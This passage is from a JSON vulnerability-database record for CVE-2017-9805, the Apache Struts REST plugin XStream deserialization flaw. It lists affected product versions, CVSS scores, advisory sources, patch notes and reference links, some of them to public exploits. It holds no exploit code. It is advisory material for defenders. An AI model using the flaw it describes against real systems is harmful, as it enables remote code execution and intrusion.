"version": "8.0.3"
},
{
"model": "financial services basel regulatory capital basic",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services basel regulatory capital basic",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services asset liability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.5"
},
{
"model": "financial services asset liability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services asset liability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services asset liability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services asset liability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services asset liability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.1.1"
},
{
"model": "financial services asset liability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.1"
},
{
"model": "financial services asset liability management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "6.0"
},
{
"model": "financial services analytical applications reconciliation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.4"
},
{
"model": "financial services analytical applications reconciliation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.3"
},
{
"model": "financial services analytical applications reconciliation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services analytical applications reconciliation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0.1"
},
{
"model": "financial services analytical applications reconciliation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "8.0"
},
{
"model": "financial services analytical applications reconciliation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.5.1"
},
{
"model": "financial services analytical applications reconciliation",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.5"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "7.3"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "7.2"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.1.1"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "11.5"
},
{
"model": "communications policy management",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "12.2"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 1.8,
"vendor": "oracle",
"version": "16.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.8,
"vendor": "apache",
"version": "2.5.8"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.8,
"vendor": "apache",
"version": "2.5.7"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.8,
"vendor": "apache",
"version": "2.5.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.8,
"vendor": "apache",
"version": "2.5.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.8,
"vendor": "apache",
"version": "2.5.10"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.8,
"vendor": "apache",
"version": "2.5.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.8,
"vendor": "apache",
"version": "2.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.31"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.30"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.28"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.24"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.8"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.7"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.32"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.29"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.20"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.16"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.5,
"vendor": "apache",
"version": "2.3.15"
},
{
"model": "network performance analysis",
"scope": "eq",
"trust": 1.2,
"vendor": "cisco",
"version": "0"
},
{
"model": "mxe series media experience engines",
"scope": "eq",
"trust": 1.2,
"vendor": "cisco",
"version": "35000"
},
{
"model": "digital media manager",
"scope": "eq",
"trust": 1.2,
"vendor": "cisco",
"version": "0"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.5.9"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.5.6"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.5.4"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.5.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.33"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.28.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.24.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.24.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.24.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.20.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.20.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.20.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.16.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.16.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.16.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.15.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.15.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.15.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.14.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.14.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.14.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.14"
},
{
"model": "struts",
"scope": "ne",
"trust": 1.2,
"vendor": "apache",
"version": "2.3.34"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.2.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.1.8"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.1.6"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.1.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.1.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.1.4"
},
{
"model": "struts",
"scope": "eq",
"trust": 1.2,
"vendor": "apache",
"version": "2.1.3"
},
{
"model": "hosted collaboration solution",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "hosted collaboration solution",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.0\\(1\\)"
},
{
"model": "struts",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.3.34"
},
{
"model": "network performance analysis",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "struts",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.5.0"
},
{
"model": "digital media manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "hosted collaboration solution",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.6\\(1\\)"
},
{
"model": "video distribution suite for internet streaming",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "oncommand balance",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "struts",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.5.13"
},
{
"model": "media experience engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.5"
},
{
"model": "struts",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.1.2"
},
{
"model": "media experience engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.5.2"
},
{
"model": "hosted collaboration solution",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "10.5\\(1\\)"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.10.1"
},
{
"model": "struts",
"scope": "ne",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.12"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.3.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.3.4"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.3.1"
},
{
"model": "video distribution suite for internet streaming",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified intelligent contact management enterprise",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "0"
},
{
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "0"
},
{
"model": "hosted collaboration solution for contact center",
"scope": "eq",
"trust": 0.9,
"vendor": "cisco",
"version": "0"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.12"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.11"
},
{
"model": "struts",
"scope": "ne",
"trust": 0.9,
"vendor": "apache",
"version": "2.5.13"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apache struts",
"version": null
},
{
"model": "struts",
"scope": "lte",
"trust": 0.8,
"vendor": "apache",
"version": "2.1.2 from 2.3.33"
},
{
"model": "struts",
"scope": "lte",
"trust": 0.8,
"vendor": "apache",
"version": "2.5 from 2.5.12"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.3.41"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.2.11"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.1.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.3.1.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.3.1.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.2.3.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.2.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.1.8.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.6,
"vendor": "apache",
"version": "2.2.1.1"
},
{
"model": "xstream",
"scope": "eq",
"trust": 0.3,
"vendor": "xstream",
"version": "0"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.1"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.12"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.10"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.2"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.8"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.1"
},
{
"model": "video distribution suite for internet streaming vds-is",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.4"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.3"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.13"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.11"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.6"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.1"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.7"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.5"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.14"
},
{
"model": "struts",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.0.9"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#112992"
},
{
"db": "BID",
"id": "99562"
},
{
"db": "BID",
"id": "99563"
},
{
"db": "BID",
"id": "99484"
},
{
"db": "BID",
"id": "100612"
},
{
"db": "BID",
"id": "100611"
},
{
"db": "BID",
"id": "100609"
},
{
"db": "BID",
"id": "100829"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-914"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006931"
},
{
"db": "NVD",
"id": "CVE-2017-9805"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apache:struts",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006931"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Yasser Zamani",
"sources": [
{
"db": "BID",
"id": "99562"
}
],
"trust": 0.3
},
"cve": "CVE-2017-9805",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-9805",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 10.0,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "COMPLETE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.3,
"exploitability": "FUNCTIONAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-9805",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "OFFICIAL FIX",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "HIGH",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2017-006931",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2017-9805",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "IPA",
"availabilityImpact": "Low",
"baseScore": 7.3,
"baseSeverity": "High",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2017-006931",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-9805",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2017-9805",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-9805",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2017-006931",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201706-914",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-9805",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#112992"
},
{
"db": "VULMON",
"id": "CVE-2017-9805"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-914"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006931"
},
{
"db": "NVD",
"id": "CVE-2017-9805"
},
{
"db": "NVD",
"id": "CVE-2017-9805"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. Apache Struts 2 framework, versions 2.5 to 2.5.12, with REST plugin insecurely deserializes untrusted XML data. A remote, unauthenticated attacker can leverage this vulnerability to execute arbitrary code in the context of the Struts application. Apache Struts2 Contains a vulnerability that allows arbitrary code execution (S2-052) Exists. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Apache Struts is prone to a remote code-execution vulnerability. Failed exploit attempts will likely result in denial-of-service conditions. \nApache Struts 2.1.2 through 2.3.33 and 2.5 through 2.5.12 are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9805"
},
{
"db": "CERT/CC",
"id": "VU#112992"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006931"
},
{
"db": "BID",
"id": "99562"
},
{
"db": "BID",
"id": "99563"
},
{
"db": "BID",
"id": "99484"
},
{
"db": "BID",
"id": "100612"
},
{
"db": "BID",
"id": "100611"
},
{
"db": "BID",
"id": "100609"
},
{
"db": "BID",
"id": "100829"
},
{
"db": "VULMON",
"id": "CVE-2017-9805"
}
],
"trust": 4.32
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/112992",
"trust": 0.8,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=42627",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#112992"
},
{
"db": "VULMON",
"id": "CVE-2017-9805"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-9805",
"trust": 5.4
},
{
"db": "CERT/CC",
"id": "VU#112992",
"trust": 3.5
},
{
"db": "BID",
"id": "100609",
"trust": 1.9
},
{
"db": "SECTRACK",
"id": "1039263",
"trust": 1.6
},
{
"db": "EXPLOIT-DB",
"id": "42627",
"trust": 1.6
},
{
"db": "JVN",
"id": "JVNVU92761484",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006931",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201706-914",
"trust": 0.6
},
{
"db": "BID",
"id": "99562",
"trust": 0.3
},
{
"db": "BID",
"id": "99563",
"trust": 0.3
},
{
"db": "BID",
"id": "99484",
"trust": 0.3
},
{
"db": "BID",
"id": "100612",
"trust": 0.3
},
{
"db": "BID",
"id": "100611",
"trust": 0.3
},
{
"db": "BID",
"id": "100829",
"trust": 0.3
},
{
"db": "VULMON",
"id": "CVE-2017-9805",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#112992"
},
{
"db": "VULMON",
"id": "CVE-2017-9805"
},
{
"db": "BID",
"id": "99562"
},
{
"db": "BID",
"id": "99563"
},
{
"db": "BID",
"id": "99484"
},
{
"db": "BID",
"id": "100612"
},
{
"db": "BID",
"id": "100611"
},
{
"db": "BID",
"id": "100609"
},
{
"db": "BID",
"id": "100829"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-914"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006931"
},
{
"db": "NVD",
"id": "CVE-2017-9805"
}
]
},
"id": "VAR-201709-1229",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.29166666
},
"last_update_date": "2025-12-20T23:27:05.049000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Announcements - 05 September 2017 - Struts 2.5.13 General Availability",
"trust": 0.8,
"url": "https://struts.apache.org/announce.html"
},
{
"title": "S2-050: A regular expression Denial of Service when using URLValidator (similar to S2-044 \u0026 S2-047)",
"trust": 0.8,
"url": "https://struts.apache.org/docs/s2-050.html"
},
{
"title": "S2-051: A remote attacker may create a DoS attack by sending crafted xml request when using the Struts REST plugin",
"trust": 0.8,
"url": "https://struts.apache.org/docs/s2-051.html"
},
{
"title": "S2-052: Possible Remote Code Execution attack when using the Struts REST plugin with XStream handler to handle XML payloads",
"trust": 0.8,
"url": "https://cwiki.apache.org/confluence/display/WW/S2-052"
},
{
"title": "Apache Struts REST plugin Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=96764"
},
{
"title": "Red Hat: CVE-2017-9805",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2017-9805"
},
{
"title": "Cisco: Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20170907-struts2"
},
{
"title": "Brocade Security Advisories: BSA-2017-427",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=a001b1600f58e0e70253dc5b53eaa134"
},
{
"title": "Oracle: Oracle Security Alert Advisory - CVE-2017-9805",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=6b1cb2cef1b849b4466dd22ab18f80c9"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
},
{
"title": "S2-052",
"trust": 0.1,
"url": "https://github.com/iBearcat/S2-052 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-9805"
},
{
"db": "CNNVD",
"id": "CNNVD-201706-914"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006931"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-502",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-9805"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "https://struts.apache.org/docs/s2-052.html"
},
{
"trust": 2.7,
"url": "https://www.kb.cert.org/vuls/id/112992"
},
{
"trust": 2.5,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170907-struts2"
},
{
"trust": 2.4,
"url": "https://lgtm.com/blog/apache_struts_cve-2017-9805"
},
{
"trust": 2.1,
"url": "http://struts.apache.org/"
},
{
"trust": 2.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html"
},
{
"trust": 1.9,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1488482"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id/1039263"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20170907-0001/"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/100609"
},
{
"trust": 1.6,
"url": "https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html"
},
{
"trust": 1.6,
"url": "https://www.exploit-db.com/exploits/42627/"
},
{
"trust": 1.6,
"url": "https://cwiki.apache.org/confluence/display/ww/s2-052"
},
{
"trust": 1.2,
"url": "http://httpd.apache.org/"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2017-9805"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.8,
"url": "https://github.com/rapid7/metasploit-framework/pull/8924/files"
},
{
"trust": 0.8,
